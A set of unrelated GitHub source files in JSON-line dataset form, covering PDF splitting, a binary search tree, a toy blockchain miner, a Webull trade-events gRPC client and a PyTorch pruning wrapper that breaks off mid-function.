chunk_name = filename.strip() + \" \" + str(index + 1) + \".pdf\"\n\n for page in chunk:\n writer.add_page(page)\n\n with open(os.path.join(destination, chunk_name), \"wb\") as output_pdf:\n writer.write(output_pdf)\n\n\ndef split_pdf_by_interval(file_path: str, destination: str, output_name: str, interval: int):\n pdf = PdfReader(file_path)\n\n pdf_chunks = split_array_by_interval(array=pdf.pages, interval=interval)\n\n write_pdf_chunks(\n pdf_chunks=pdf_chunks,\n 
destination=destination,\n filename=output_name\n )\n\n\ndef split_pdf_by_ranges(file_path: str, destination: str, output_name: str, ranges: list[tuple]):\n pdf = PdfReader(file_path)\n\n pdf_chunks = split_array_by_ranges(array=pdf.pages, ranges=ranges)\n\n write_pdf_chunks(\n pdf_chunks=pdf_chunks,\n destination=destination,\n filename=output_name\n )\n\n\nif __name__ == \"__main__\":\n # split_pdf_by_interval(\n # file_path=\"pdfs/bol.pdf\",\n # destination=\"pdfs/Best Of Lady Gaga\",\n # output_name=\"Best Of Lady Gaga - Trompette\",\n # interval=2\n # )\n split_pdf_by_ranges(\n file_path=\"pdfs/bol.pdf\",\n destination=\"pdfs/Best Of Lady Gaga\",\n output_name=\"Best Of Lady Gaga - Trompette\",\n ranges=[(1, 2), (3, 4), (5, 6)]\n )\n","repo_name":"PaulTorchet/pdf-tool","sub_path":"pdf_tool/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10589449901","text":"import os\n\nimport torch\n\nfrom language.utils.log import get_logger\n\n\nlogger = get_logger()\n\n\ndef save_embedding(embedding, path):\n \"\"\"\n Save word embedding tensor.\n :param embedding: Tensor, embedding tensor.\n :param path: path to save.\n :return: None.\n \"\"\"\n logger.info(f'Dumping word embedding to {path}.')\n os.makedirs(os.path.dirname(path), exist_ok=True)\n torch.save(embedding, path)\n\n\ndef load_embedding(path):\n \"\"\"\n Load word embedding tensor.\n :param path: path to embedding.\n :return: Tensor, word embedding.\n \"\"\"\n logger.info(f'Loading word embedding from {path}.')\n if not os.path.exists(path):\n raise FileExistsError(f'{path} does not exist.')\n\n return torch.load(path)\n","repo_name":"jishuguang/language","sub_path":"language/lm/utils/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13266887644","text":"# Author: Justin Huang\n# GitHub username: huangjus\n# Date: 2/28/23\n# Description: takes a string as input and returns a dictionary that counts the occurrences of\n# each uppercase letter in the string. 
Letters are counted case-insensitively,\n# and lower-case letters are converted to uppercase before counting.\n\ndef count_letters(string):\n\n    \"\"\"\n    Count the occurrences of each uppercase letter in the input string.\n\n    string: The input string.\n    \"\"\"\n\n    counts = {}\n    for char in string:\n        if char.isupper():\n            if char in counts:\n                counts[char] += 1\n            else:\n                counts[char] = 1\n        elif char.islower():\n            char_upper = char.upper()\n            if char_upper in counts:\n                counts[char_upper] += 1\n            else:\n                counts[char_upper] = 1\n    return counts\n","repo_name":"huangjus/count_letters.py","sub_path":"count_letters.py","file_name":"count_letters.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17763082763","text":"#!/usr/bin/env python\n\nimport bitcodin\n\n# Set your API key\nbitcodin.api_key = 'INSERT YOUR API KEY'\n\n# Create an input\ninput_obj = bitcodin.Input(url='http://bitbucketireland.s3.amazonaws.com/Sintel-original-short.mkv')\ninput_result = bitcodin.create_input(input_obj)\n\n# Create encoding profile\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n    default_stream_id=0,\n    bitrate=4800000,\n    profile='Main',\n    preset='premium',\n    height=1080,\n    width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n    default_stream_id=0,\n    bitrate=2400000,\n    profile='Main',\n    preset='premium',\n    height=768,\n    width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n    default_stream_id=0,\n    bitrate=1200000,\n    profile='Main',\n    preset='premium',\n    height=480,\n    width=854\n))\n\naudio_configs = [bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000)]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\n# Create a job\njob = bitcodin.Job(\n    input_id=input_result.input_id,\n    encoding_profile_id=encoding_profile_result.encoding_profile_id,\n    manifest_types=manifests\n)\njob_result = bitcodin.create_job(job)\nprint(\"Job created!\")\n\n# Create a thumbnail at second 50 with a height of 320px from a given job\n# Note: You don't have to create a new job for a thumbnail, you can use finished jobs too.\nthumbnail_request = bitcodin.ThumbnailRequest(job_id=job_result.job_id, height=320, position=50)\nthumbnail = bitcodin.create_thumbnail(thumbnail_request)\n\nprint(\"Thumbnail generated!\\nURL to thumbnail: %s\\n\" % thumbnail.thumbnail_url)\n\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_thumbnail.py","file_name":"create_thumbnail.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
{"seq_id":"24776480349","text":"import collections\nimport datetime\nimport Crypto.Hash.SHA256 as sha\n\n\nclass Block:\n\tdef __init__(self, merkel_root, prev_block_hash, serial):\n\t\tself.timestamp = datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\t\tself.nonce = \"\"\n\t\tself.merkel_root = merkel_root\n\t\tself.prev_block_hash = prev_block_hash\n\t\tself.serial = serial\n\n\t\tfind_nonce(self)\n\n\tdef get_block(self):\n\t\treturn collections.OrderedDict({\n\t\t\t'timestamp': self.timestamp,\n\t\t\t'nonce': self.nonce,\n\t\t\t'merkel_root': self.merkel_root,\n\t\t\t'prev_block_hash': self.prev_block_hash,\n\t\t\t'serial': self.serial\n\t\t})\n\n\ndef find_nonce(block):\n\tprefix = '000'\n\tfor i 
in range(100000):\n\t\tblock.nonce = i\n\t\thash = hash_block(block.get_block())\n\t\tif hash.startswith(prefix):\n\t\t\tprint(\"\\n----------POW----------\")\n\t\t\tprint(\"hash: \" + hash +\"\\nFound with nonce:\"+str(i))\n\t\t\treturn hash\n\n\ndef hash_block(block):\n\treturn sha.new(str(block).encode('utf8')).hexdigest()\n","repo_name":"mentol555/kripto","sub_path":"block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10974208710","text":"from datetime import date\nfrom typing import Union\nfrom t10.pessoa import Pessoa\nfrom t10.mecanico import Mecanico\n\n\nclass Bicicleta:\n def __init__(self,\n cor: str,\n comprimento: float,\n altura: float,\n aro: int,\n data_compra: date,\n periodicidade_revisao: int) -> None:\n\n self._dono: Union[Pessoa, None] = None\n self._cor = cor\n self._comprimento = comprimento\n self._altura = altura\n self._aro = aro\n self._ultima_revisao = data_compra\n self._periodicade_revisao = periodicidade_revisao\n self._ultimo_mecanico: Union[Mecanico, None] = None\n\n def pintar(self, nova_cor: str) -> None:\n self._cor = nova_cor\n\n def trocar_roda(self, novo_aro: int) -> None:\n self._aro = novo_aro\n\n def anotar_revisao(self, data: date, mecanico: Mecanico) -> None:\n self._ultima_revisao = data\n self._ultimo_mecanico = mecanico\n\n def atribuir_dono(self, dono: Pessoa) -> None:\n self._dono = dono\n\n def __str__(self) -> str:\n ret_str = \"Descrição da bicicleta\\n\"\n ret_str += f\"Cor: {self._cor}\\n\"\n ret_str += \"Dimensões: \\n\"\n ret_str += f\" Comprimento: {self._comprimento} cm\\n\"\n ret_str += f\" Altura: {self._altura} cm\\n\\n\"\n\n if self._ultimo_mecanico is not None:\n ret_str += f\"Revisada por {self._ultimo_mecanico}, \"\n ret_str += f\"em {self._ultima_revisao.strftime('%d/%m/%Y')}\\n\"\n\n ret_str += f\"A ser revisada a cada {self._periodicade_revisao} dia(s)\"\n\n return ret_str\n","repo_name":"vmvuno/poo-2023-01","sub_path":"t10/bicicleta.py","file_name":"bicicleta.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17716567240","text":"from Decl import Decl\r\nfrom Core import Core\r\nfrom FuncDecl import FuncDecl\r\n\r\nclass DeclSeq:\r\n\t\r\n\tdef parse(self, parser):\r\n\t\tif parser.scanner.currentToken() == Core.INT:\r\n\t\t\tself.decl = Decl()\r\n\t\t\tself.decl.parse(parser)\r\n\t\telse:\r\n\t\t\tself.function = FuncDecl()\r\n\t\t\tself.function.parse(parser)\r\n\t\tif not parser.scanner.currentToken() == Core.BEGIN:\r\n\t\t\tself.ds = DeclSeq()\r\n\t\t\tself.ds.parse(parser)\r\n\t\r\n\tdef semantic(self, parser):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.semantic(parser)\r\n\t\telse:\r\n\t\t\tself.function.semantic(parser)\r\n\t\tif hasattr(self, 'ds'):\r\n\t\t\tself.ds.semantic(parser)\r\n\t\r\n\tdef print(self, indent):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.print(indent)\r\n\t\telse:\r\n\t\t\tself.function.print(indent)\r\n\t\tif hasattr(self, 'ds'):\r\n\t\t\tself.ds.print(indent)\r\n\r\n\tdef execute(self, executor):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.execute(executor)\r\n\t\telse:\r\n\t\t\tself.function.execute(executor)\r\n\t\tif hasattr(self, 
'ds'):\r\n\t\t\tself.ds.execute(executor)","repo_name":"DanielH2018/core_language","sub_path":"DeclSeq.py","file_name":"DeclSeq.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41778149181","text":"\"\"\"\n This is a binary search tree class\n the left son value is less then the parent value\n the parent value is less then the right son value\n\"\"\"\n\n\nclass BinaryTree:\n\n def __init__(self, valeur):\n self.val = valeur\n self.right = None\n self.left = None\n \n\n def isLeaf(self):\n return self.left == None and self.right == None\n\n def insert(self,value):\n\n if self.val == value: return\n \n # find the sub tree in which we will insert the value\n\n if self.val < value :\n if(self.right == None) : self.right = BinaryTree(value)\n return self.right.insert(value)\n else:\n if(self.left == None) : self.left = BinaryTree(value)\n return self.left.insert(value)\n\n \n\n\n def prefix_print(self):\n \"\"\"\n we print the value of the current root\n then we print the value of the left son node\n and finally we print the value of the right son node\n \"\"\"\n\n # base case\n if self == None:\n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n # recursive case\n print(self.val)\n\n if self.left != None:\n self.left.prefix_print() \n\n if self.right != None:\n self.right.prefix_print()\n \n return\n\n\n def infix_print(self):\n \"\"\"\n on affiche le sous arbre gauche\n puis on affiche la racine actuelle\n puis enfin, on affiche le sous arbre droit\n \"\"\"\n\n # base case\n if self == None: \n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n\n # recursive case\n\n if self.left != None:\n self.left.infix_print()\n \n print(self.val)\n\n if self.right != None:\n self.right.infix_print()\n\n return\n\n\n\n def posfix_print(self):\n \"\"\"\n on affiche le sous arbre gauche\n puis, on affiche le sous arbre droit\n enfin, on affiche la racine\n \"\"\"\n\n # base case\n if self == None: \n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n\n # recursive case\n\n if self.left != None:\n self.left.posfix_print()\n \n\n if self.right != None:\n self.right.posfix_print()\n\n print(self.val)\n return\n\n\n\n def search(self, value, currentDepth):\n \"\"\"\n search the value withing the binary tree, \n and return the depth in with it resides\n \"\"\"\n\n # base case\n if self == None:\n return -1\n\n if self.isLeaf():\n if self.val == value:\n return currentDepth\n else:\n return -1\n \n if self.val == value:\n return currentDepth\n\n # recursive cases:\n\n if value < self.val:\n # search within the left sub tree\n if self.left != None:\n return self.left.search(value, currentDepth +1)\n else :\n return -1\n \n else :\n # search within the right sub tree\n if self.right != None:\n return self.right.search(value, currentDepth+1)\n else: \n return -1\n\n\n def bfs(self, queue):\n \"\"\"\n this is a breadth first search, in with we \n visit all the adjacent nodes to the current node\n before going one depth further\n \n \"\"\" \n\n # base case\n if self == None:\n return\n \n if self.isLeaf() and self.val not in queue:\n queue.append(self.val)\n return\n\n # visit the current adjacent nodes ( left and right then current)\n \n if self.val not in queue:\n queue.append(self.val)\n\n if self.left != None:\n if self.left.val not in queue:\n queue.append(self.left.val)\n \n if self.right != None:\n if self.right.val not in queue:\n queue.append(self.right.val)\n\n\n\n # 
recursive case\n        if self.left != None:\n            self.left.bfs(queue)\n        \n        if self.right != None:\n            self.right.bfs(queue)\n\n        \n        return queue\n\n\n","repo_name":"MassiGy/DS-practice-with-python","sub_path":"binaryTrees/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"69897977448","text":"import json\nfrom collections import OrderedDict\n\ndef formatOutput(isFailed, output):\n    if isFailed > 0:\n        output['state'] = 'failed'\n    return json.dumps(OrderedDict([('state', output['state']), \n                                    ('confStatus', output['confStatus']), \n                                    ('htpStatus', output['htpStatus']), \n                                    ('nginxStatus', output['nginxStatus'])]))\n","repo_name":"jonathanmontenez/AdmissionsConfs","sub_path":"app/utils/fmt.py","file_name":"fmt.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"26763481135","text":"import random\n\n\nprint('esto es un cadena de caracteres')\n\n\narreglo = [12, 25, 96, 87, 63, 98, 78, 63, 75]\n\nfor i in range(0, len(arreglo)):\n    valor = arreglo[i]\n    print(f'el valor {valor} esta pocision {i}' )\n\nl = 20\nlista = [random.randint(0, 100) for i in range(l)]\nprint(lista)\n\n# example of how to destructure in python \nproductos = [\n    {'nombre': 'jabon palmolive', 'precio': 12},\n    {'nombre': 'leche en polvo', 'precio': 120},\n    {'nombre': 'arroz pinillar', 'precio': 150}\n]\n\nproductos.append({'nombre': 'jabon coco', 'precio': 1000})\nproductos.append({'nombre': 'jabon canalita', 'precio': 2000})\n\nprint(productos)\n\nsuma = 0\n\nfor i in range(0, len(productos)):\n    elemento = productos[i]\n    nombre, precio = elemento.values()\n    print(precio)\n    suma += precio\n    \n    \nprint(suma) \n\nprint(5 + 6)","repo_name":"BaguirreTim3/PracticasPython","sub_path":"arreglos/practicas.py","file_name":"practicas.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20726868227","text":"import enchant\nimport pandas as pd\nimport string\nfrom collections import Counter\n\nticker_bin = Counter()\n\ndef clean_word(word):\n    res = []\n    [res.append(c) for c in word if c not in string.punctuation and c.isalpha()]\n    return ''.join(res)\n\ndef ticker_extractor(text):\n    global ticker_bin\n    words = text.split()\n    words = set([clean_word(word) for word in words])\n    words = words & tickers | words & set([ticker.upper() for ticker in tickers])\n    words = [word for word in words if not d.check(word)\n             or (d.check(word) and word.isupper() and word not in ['A', 'IM'])]\n    words = [word.upper() for word in words]\n    ticker_bin += Counter(words)\n    print(ticker_bin)\n\nprice = pd.read_parquet('rus_price_150321.parquet', engine='pyarrow')\ndiscussion = pd.read_csv('wsb_comments.csv', error_bad_lines=False, index_col=False, dtype='unicode')\ndiscussion = discussion.drop_duplicates('text')\ntickers = price.columns[1::2]\ntickers = [item.split(',') for item in tickers]\ntickers = set((item for sublist in tickers for item in sublist))\ndiscussion['text'] = discussion['text']\nd = enchant.Dict(\"en_US\")\n\ndiscussion = discussion[discussion['text'].notnull()]\ndiscussion.text.apply(lambda x: ticker_extractor(x))\nticker_bin = [word for word, cnt in ticker_bin.most_common(20)]\nprint('end')\nprint(ticker_bin)\n","repo_name":"YanRemes/Analyse-stock-market-based-on-the-sentiment-analysis","sub_path":"1. 
Most_Commonly_Used_Tickers.py","file_name":"1. Most_Commonly_Used_Tickers.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20711624045","text":"import requests\n\nfrom bs4 import BeautifulSoup\n\noutputFileName = input(\"Enter the name for the output file: \")\nopenFile = open(outputFileName, 'w')\n\nbase_url = 'http://www.vanityfair.com/society/2014/06/monica-lewinsky-humiliation-culture'\nr = requests.get(base_url)\nsoup = BeautifulSoup(r.text, features=\"html.parser\")\n \nfor textP in soup.find_all('p'): \n if textP.a: \n openFile.write(textP.a.text.replace(\"\\n\", \" \").strip())\n else: \n openFile.write(textP.contents[0].strip())\n\nopenFile.close()","repo_name":"ggFletcher/PythonExercises","sub_path":"ScriptPractice21.py","file_name":"ScriptPractice21.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22721285381","text":"import json\nimport logging\nimport threading\nimport time\n\nimport grpc\nfrom webullsdkcore.common import api_type\nfrom webullsdkcore.endpoint.default_endpoint_resolver import \\\n DefaultEndpointResolver\nfrom webullsdkcore.endpoint.resolver_endpoint_request import \\\n ResolveEndpointRequest\nfrom webullsdkcore.retry.retry_condition import RetryCondition\n\nimport webullsdktradeeventscore.events_pb2 as pb\nimport webullsdktradeeventscore.events_pb2_grpc as pb_grpc\nfrom webullsdktradeeventscore.default_retry_policy import (\n DefaultSubscribeRetryPolicy, SubscribeRetryPolicyContext)\nfrom webullsdktradeeventscore.signature_composer import calc_signature\n\n# contentTypes\nJSON = \"application/json\"\nTEXT = \"text/plain\"\n\nDEFAULT_REGION_ID = \"us\"\n\n\nclass EventsClient():\n def __init__(self, app_key, app_secret, region_id=DEFAULT_REGION_ID, host=None, port=443, tls_enable=True, retry_policy=None):\n self._app_key = app_key\n self._app_secret = app_secret\n self._region_id = region_id\n self._tls_enable = tls_enable\n self._endpoint_resolver = DefaultEndpointResolver(self)\n if not host:\n endpoint_request = ResolveEndpointRequest(\n self._region_id, api_type=api_type.EVENTS)\n endpoint = self._endpoint_resolver.resolve(endpoint_request)\n self._host = endpoint\n else:\n self._host = host\n self._port = port\n if retry_policy:\n self._retry_policy = retry_policy\n else:\n self._retry_policy = DefaultSubscribeRetryPolicy()\n\n self._logger = None\n self._in_callback_mutex = threading.Lock()\n self._callback_mutex = threading.RLock()\n # callbacks\n self._on_connect = None\n self._on_events_message = None\n self._on_log = None\n\n def _build_request(self, app_key, app_secret, accounts):\n request = pb.SubscribeRequest(\n subscribeType=1, # only 1 allowed now\n timestamp=int(time.time() * 1000), # millis\n accounts=accounts,\n )\n signature, metadata = calc_signature(app_key, app_secret, request)\n return request, metadata\n\n def _stream_processing(self, stub, accounts):\n retry_policy_context = SubscribeRetryPolicyContext(None, 0, None)\n retries = 0\n final_exception = None\n while True:\n request, metadata = self._build_request(\n self._app_key, self._app_secret, accounts)\n try:\n response_iterator = stub.Subscribe(\n request=request, metadata=metadata)\n for response in response_iterator:\n self._easy_handler(response)\n except grpc.RpcError as rpc_error:\n state = rpc_error._state\n final_exception = rpc_error\n retry_policy_context = 
SubscribeRetryPolicyContext(\n None, retries, state.code)\n self._easy_log(logging.ERROR, \"grpc error code:%s, error msg:%s, details:%s\",\n state.code, state.details, state.debug_error_string)\n except Exception as exception:\n final_exception = exception\n retry_policy_context = SubscribeRetryPolicyContext(\n exception, retries, None)\n self._easy_log(logging.ERROR, \"grpc exception:%s\", exception)\n retryable = self._retry_policy.should_retry(retry_policy_context)\n if retryable & RetryCondition.NO_RETRY:\n self._easy_log(\n logging.ERROR, \"processing will stopped due to not be retryable, retry_context:%s\", retry_policy_context)\n break\n retry_policy_context.retryable = retryable\n time_to_sleep = self._retry_policy.compute_delay_before_next_retry(\n retry_policy_context)\n self._easy_log(logging.INFO, \"next retry will be started in %s ms, retry_context:%s\",\n time_to_sleep, retry_policy_context)\n time.sleep(time_to_sleep / 1000.0)\n retries += 1\n retry_policy_context.retries_attempted = retries\n if final_exception:\n raise final_exception\n\n @property\n def on_connect(self):\n return self._on_connect\n\n @on_connect.setter\n def on_connect(self, func):\n with self._callback_mutex:\n self._on_connect = func\n\n @property\n def on_events_message(self):\n return self._on_events_message\n\n @on_events_message.setter\n def on_events_message(self, func):\n with self._callback_mutex:\n self._on_events_message = func\n\n @property\n def on_log(self):\n return self._on_log\n\n @on_log.setter\n def on_log(self, func):\n self._on_log = func\n\n def _easy_log(self, level, fmt, *args):\n if self.on_log is not None:\n buf = fmt % args\n try:\n self.on_log(level, buf)\n except Exception:\n pass\n if self._logger is not None:\n self._logger.log(level, fmt, *args)\n\n def enable_logger(self, logger=None):\n if logger is None:\n if self._logger is not None:\n return\n logger = logging.getLogger(__name__)\n self._logger = logger\n\n def disable_logger(self):\n self._logger = None\n\n def _handle_subscribe_success(self, response):\n self._easy_log(\n logging.INFO, \"subscribe success, response:%s\", response)\n with self._callback_mutex:\n on_connect = self.on_connect\n if not on_connect:\n return\n with self._in_callback_mutex:\n try:\n on_connect(self, response.payload, response)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in on_connect: %s', err)\n raise err\n\n def _handle_default(self, response, level):\n self._easy_log(level, \"response:%s\", response)\n\n def _handle_message(self, response):\n self._easy_log(\n logging.DEBUG, \"message received, response:%s\", response)\n with self._callback_mutex:\n on_events_message = self.on_events_message\n if not on_events_message:\n return\n with self._in_callback_mutex:\n content_type = response.contentType\n _payload = response.payload\n if JSON == content_type:\n try:\n _payload = json.loads(response.payload)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in decode message: %s, %s', _payload, err)\n raise err\n try:\n on_events_message(response.eventType,\n response.subscribeType, _payload, response)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in on_events_message: %s', err)\n raise err\n\n def _easy_handler(self, response):\n event_type = response.eventType\n if event_type == pb.SubscribeSuccess:\n self._handle_subscribe_success(response)\n elif event_type == pb.Ping:\n self._handle_default(response, logging.DEBUG)\n elif event_type == 
pb.AuthError:\n            self._handle_default(response, logging.FATAL)\n        elif event_type == pb.NumOfConnExceed:\n            self._handle_default(response, logging.FATAL)\n        elif event_type == pb.SubscribeExpired:\n            self._handle_default(response, logging.FATAL)\n        else:\n            self._handle_message(response)\n\n    def do_subscribe(self, accounts):\n        target = self._host + \":\" + str(self._port)\n        if self._tls_enable:\n            ssl_channel_credentials = grpc.ssl_channel_credentials()\n            with grpc.secure_channel(target, ssl_channel_credentials) as channel:\n                stub = pb_grpc.EventServiceStub(channel)\n                self._stream_processing(stub, accounts)\n        else:\n            with grpc.insecure_channel(target) as channel:\n                stub = pb_grpc.EventServiceStub(channel)\n                self._stream_processing(stub, accounts)\n","repo_name":"webull-inc/openapi-python-sdk","sub_path":"webull-python-sdk-trade-events-core/webullsdktradeeventscore/events_client.py","file_name":"events_client.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"}
{"seq_id":"9755288969","text":"from elixir import *\nimport datetime\n\nmetadata.bind = \"sqlite:///fex.dbf\"\nmetadata.bind.echo = False\n\nclass Entite(Entity):\n    using_options(tablename=u'ENTITE')\n    codent = Field(Unicode(10))\n    nom = Field(Unicode(30))\n    description = Field(UnicodeText, default=u\"\" )\n    typ = Field(Unicode(10), default=u'CLIENT')\n    parent = ManyToOne(u'Entite')\n    def __repr__(self):\n        return '' % (self.codent, self.typ, self.parent)\n\nclass User(Entity):\n    using_options(tablename=u'USER')\n    codusr = Field(Unicode(10))\n    name = Field(Unicode(30))\n    entite = ManyToOne(u'Entite')\n    email = Field(Unicode(20))\n    IsAdmin = Field(Boolean, default=False)\n    def __repr__(self):\n        return '' % (self.codusr, self.entite, self.IsAdmin)\n\nclass Fex(Entity):\n    using_options(tablename=u'FEX')\n    nom = Field(Unicode(30))\n    description = Field(UnicodeText)\n    status = Field(Unicode(10))\n    expediteur = ManyToOne(u'User')\n    destinataire = ManyToOne(u'User')\n    date_creation = Field(DateTime, default=datetime.datetime.now)\n    date_modif = Field(DateTime)\n    date_depot = Field(DateTime)\n    date_retrait = Field(DateTime)\n\n    def __repr__(self):\n        return '' % (self.nom, self.status, self.expediteur, self.destinataire) \n\n","repo_name":"chrislyon/fex-file-exchange","sub_path":"fex/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"15770554030","text":"import torch\nfrom optimization.common.base import Compressor\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass PrunerModuleWrapper(torch.nn.Module):\n\n    def __init__(self, module, module_name, module_type, config, pruner):\n        \"\"\"\n        Wrap a module to enable data parallelism, forward method customization and buffer registration.\n\n        Parameters\n        ----------\n        module : pytorch module\n            the module user wants to compress\n        config : dict\n            the configurations that users specify for compression\n        module_name : str\n            the name of the module to compress, wrapper module shares same name\n        module_type : str\n            the type of the module to compress\n        pruner : Pruner\n            the pruner used to calculate mask\n        \"\"\"\n        super().__init__()\n        self.module = module\n        self.name = module_name\n        self.type = module_type\n        self.config = config\n        self.pruner = pruner\n\n\n        self.register_buffer(\"weight_mask\", torch.ones(self.module.weight.shape))\n        if hasattr(self.module, \"bias\") and 
self.module.bias is not None:\n            self.register_buffer(\"bias_mask\", torch.ones(self.module.bias.shape))\n        else:\n            self.register_buffer(\"bias_mask\", None)\n\n    def forward(self, *input):\n        self.module.weight.data = self.module.weight.data.mul_(self.weight_mask)\n        if hasattr(self.module, \"bias\") and self.module.bias is not None:\n            self.module.bias.data = self.module.bias.data.mul_(self.bias_mask)\n        return self.module(*input)\n\nclass Pruner(Compressor):\n    \"\"\"\n    Prune to an exact pruning level specification\n\n    Attributes\n    ----------\n    mask_dict : dict\n        Dictionary for saving masks, `key` should be layer name and\n        `value` should be a tensor which has the same shape with layer's weight\n\n    \"\"\"\n    def __init__(self, model, config_list, optimizer = None):\n        super().__init__(model, config_list, optimizer)\n    \n    def compress(self):\n        self.update_mask()\n        return self.bound_model\n    \n    def update_mask(self):\n        for wrapper_idx, wrapper in enumerate(self.get_modules_wrapper()):\n            masks = self.calc_mask(wrapper, wrapper_idx = wrapper_idx)\n            if masks is not None:\n                for k in masks:\n                    assert hasattr(wrapper, k), \"there is no attribute '%s' in wrapper\" %k\n                    setattr(wrapper, k, masks[k])\n\n\n    def calc_mask(self, wrapper, **kwargs):\n        \"\"\"\n        Pruners should overload this method to provide mask for weight tensors.\n        The mask must have the same shape and type comparing to the weight.\n        It will be applied with `mul()` operation on the weight.\n        This method is effectively hooked to `forward()` method of the model.\n\n        Parameters\n        ----------\n        wrapper : Module\n            calculate mask for `wrapper.module`'s weight\n        \"\"\"\n        raise NotImplementedError(\"Pruners must overload calc_mask()\")\n\n    def _wrap_modules(self, layer, config):\n        \"\"\"\n        Create a wrapper module to replace the original one.\n\n        Parameters\n        ----------\n        layer : LayerInfo\n            the layer to instrument the mask\n        config : dict\n            the configuration for generating the mask\n        \"\"\"\n        _logger.debug(\"Module detected to compress: %s.\", layer.name)\n        wrapper = PrunerModuleWrapper(layer.module, layer.name, layer.type, config, self)\n        assert hasattr(layer.module, 'weight'), \"module %s does not have 'weight' attribute\" % layer.name\n        wrapper.to(layer.module.weight.device)\n        return wrapper\n\n    def export_model(self, model_path, mask_path = None, onnx_path = None, input_shape = None, device =None, dummy_input = None, opset_version = None):\n        \"\"\"\n        Export pruned model weights, masks and onnx model(optional)\n\n        Parameters\n        ----------\n        model_path : str\n            path to save pruned model state_dict\n        mask_path : str\n            (optional) path to save mask dict\n        onnx_path : str\n            (optional) path to save onnx model\n        input_shape : list or tuple\n            input shape to onnx model, used for creating a dummy input tensor for torch.onnx.export\n            if the input has a complex structure (e.g., a tuple), please directly create the input and\n            pass it to dummy_input instead\n            note: this argument is deprecated and will be removed; please use dummy_input instead\n        device : torch.device\n            device of the model, where to place the dummy input tensor for exporting onnx file;\n            the tensor is placed on cpu if ```device``` is None\n            only useful when both onnx_path and input_shape are passed\n            note: this argument is deprecated and will be removed; please use dummy_input instead\n        dummy_input: torch.Tensor or tuple\n            dummy input to the onnx model; used when input_shape is not enough to specify dummy input\n            user should ensure that the dummy_input is on the same device as the model\n        
opset_version: int\n            opset_version parameter for torch.onnx.export; only useful when onnx_path is not None\n            if not passed, torch.onnx.export will use its default opset_version\n        \"\"\"\n        assert model_path is not None, \"model_path must be specified\"\n        mask_dict = {}\n        self._unwarp_model()\n\n        for wrapper in self.get_modules_wrapper():\n            weight_mask = wrapper.weight_mask\n            bias_mask = wrapper.bias_mask\n            if weight_mask is not None:\n                mask_sum = weight_mask.sum().item()\n                mask_num = weight_mask.numel()\n                _logger.debug(\"Layer: %s Sparsity: %.4f\", wrapper.name, 1 - mask_sum / mask_num)\n                wrapper.module.weight.data = wrapper.module.weight.data.mul(weight_mask)\n            if bias_mask is not None:\n                wrapper.module.bias.data = wrapper.module.bias.data.mul(bias_mask)\n            mask_dict[wrapper.name] = {\n                \"weight\" : weight_mask,\n                \"bias\" : bias_mask\n            }\n        torch.save(self.bound_model.state_dict(), model_path)\n        _logger.info(\"Model state_dict saved to %s\", model_path)\n\n        if mask_path is not None:\n            torch.save(mask_dict, mask_path)\n        \n        if onnx_path is not None:\n            assert input_shape is not None or dummy_input is not None, 'input_shape or dummy_input must be specified to export onnx model'\n\n            if dummy_input is None:\n                _logger.warning(\"\"\"The argument input_shape and device will be removed in the future. Please create a dummy input and pass it to dummy_input instead.\"\"\")\n\n                